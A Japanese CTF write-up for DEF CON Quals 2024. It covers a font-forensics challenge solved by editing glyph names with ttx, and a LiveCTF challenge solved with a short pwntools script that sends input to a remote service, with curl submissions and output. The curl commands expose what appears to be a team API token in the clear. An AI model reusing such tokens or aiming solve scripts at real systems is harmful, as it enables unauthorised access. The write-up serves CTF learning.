ligma (Baby's First)

Webページが読み込んでいるotfファイルをダウンロードし、その情報を確認する。

$ ttx Quals2024.otf
Dumping "Quals2024.otf" to "Quals2024.ttx"...
Dumping 'GlyphOrder' table...
Dumping 'head' table...
Dumping 'hhea' table...
Dumping 'maxp' table...
Dumping 'OS/2' table...
Dumping 'name' table...
Dumping 'cmap' table...
Dumping 'post' table...
Dumping 'CFF ' table...
Dumping 'GPOS' table...
Dumping 'GSUB' table...
Dumping 'SVG ' table...
Dumping 'gasp' table...
Dumping 'hmtx' table...
Dumping 'kern' table...

ttxファイルを見ると、各文字の他にflag、flag2、flag3が設定されている。このままだと確認しにくいので、以下の通り対応するものを置き替える。

・"a"と"flag"
・"b"と"flag2"
・"c"と"flag3"

例えば、以下のように置き換える。

修正前：<CharString name="a">
修正後：<CharString name="flag">

修正したttxファイルをotfファイルにする。

$ ttx Quals2024_mod.ttx
Compiling "Quals2024_mod.ttx" to "Quals2024_mod.otf"...
Parsing 'GlyphOrder' table...
Parsing 'head' table...
Parsing 'hhea' table...
Parsing 'maxp' table...
Parsing 'OS/2' table...
Parsing 'name' table...
Parsing 'cmap' table...
Parsing 'post' table...
Parsing 'CFF ' table...
Parsing 'GPOS' table...
Parsing 'GSUB' table...
Parsing 'SVG ' table...
Parsing 'gasp' table...
Parsing 'hmtx' table...
Parsing 'kern' table...

これを以下のOTF Viewerで読み込み、"a"や"b"、"c"を入力して、表示を確認する。

https://jumpshare.com/viewer/otf

表示された文字を連結すると、英文になり、それがフラグとして通った。

Sometimes I get Emotional over fonts

LiveCTF7 (LiveCTF)

https://play.livectf.com/のサンプルを参考に実行する。

$ cat <<EOF > Dockerfile
FROM livectf/livectf:quals-exploit
COPY solve.py /
WORKDIR /
CMD ["python3", "solve.py"]
EOF

$ cat <<EOF > solve.py
from pwn import *
HOST = os.environ.get('HOST', 'localhost')
PORT = 31337
r = remote(HOST, int(PORT))
r.recvline_contains(b'Give me input: ')
r.sendline(b'WIN')
r.recvline_contains(b'You sent: ')
r.sendline(b'./submitter')
flag = r.recvline_contains(b'LiveCTF{').decode().strip()
log.info('Flag: %s', flag)
EOF

$ tar czf solution.tar.gz Dockerfile solve.py

$ curl https://play.livectf.com/api/challenges/7 -F exploit=@solution.tar.gz -H "X-LiveCTF-Token: ticket{V92Toolbar2502n24:rDWw2ufL0c1_-1eikxq4tkUkt7_UC_syoVipMS3Sien4lq_X}"
{"exploit_id":"3f710543-06f5-4047-b1c9-e269bdd93786","team_id":392,"team_token":"ticket{V92Toolbar2502n24:rDWw2ufL0c1_-1eikxq4tkUkt7_UC_syoVipMS3Sien4lq_X}","challenge_id":7,"archive_id":"df066586-8fa7-4487-a828-1b7f2a7fa7dd","status":"Submitted","score_awarded":null,"submission_time":"2024-05-04T06:00:03.165972614","run_duration":null}

$ curl https://play.livectf.com/api/exploits/3f710543-06f5-4047-b1c9-e269bdd93786 -H "X-LiveCTF-Token: ticket{V92Toolbar2502n24:rDWw2ufL0c1_-1eikxq4tkUkt7_UC_syoVipMS3Sien4lq_X}"
{"exploit_id":"3f710543-06f5-4047-b1c9-e269bdd93786","team_id":392,"team_token":"ticket{V92Toolbar2502n24:rDWw2ufL0c1_-1eikxq4tkUkt7_UC_syoVipMS3Sien4lq_X}","challenge_id":7,"archive_id":"df066586-8fa7-4487-a828-1b7f2a7fa7dd","status":"RunSolved","score_awarded":1,"submission_time":"2024-05-04T06:00:03.165972","run_duration":4}

$ curl https://play.livectf.com/api/exploits/3f710543-06f5-4047-b1c9-e269bdd93786/output -H "X-LiveCTF-Token: ticket{V92Toolbar2502n24:rDWw2ufL0c1_-1eikxq4tkUkt7_UC_syoVipMS3Sien4lq_X}"
{"output_id":"7870fc32-e0ab-4f11-b2ce-b37b81273e36","exploit_id":"3f710543-06f5-4047-b1c9-e269bdd93786","stdout":"[x] Opening connection to 3f710543-06f5-4047-b1c9-e269bdd93786-challenge on port 31337\n[x] Opening connection to 3f710543-06f5-4047-b1c9-e269bdd93786-challenge on port 31337: Trying 10.89.0.2\n[+] Opening connection to 3f710543-06f5-4047-b1c9-e269bdd93786-challenge on port 31337: Done\n[*] Flag: Flag: LiveCTF{bb0f3ed4-db64-4a35-8f8a-0328ed5d9b82}\n[*] Closed connection to 3f710543-06f5-4047-b1c9-e269bdd93786-challenge port 31337\n","stderr":"","created_at":"2024-05-04T06:00:52.830438"}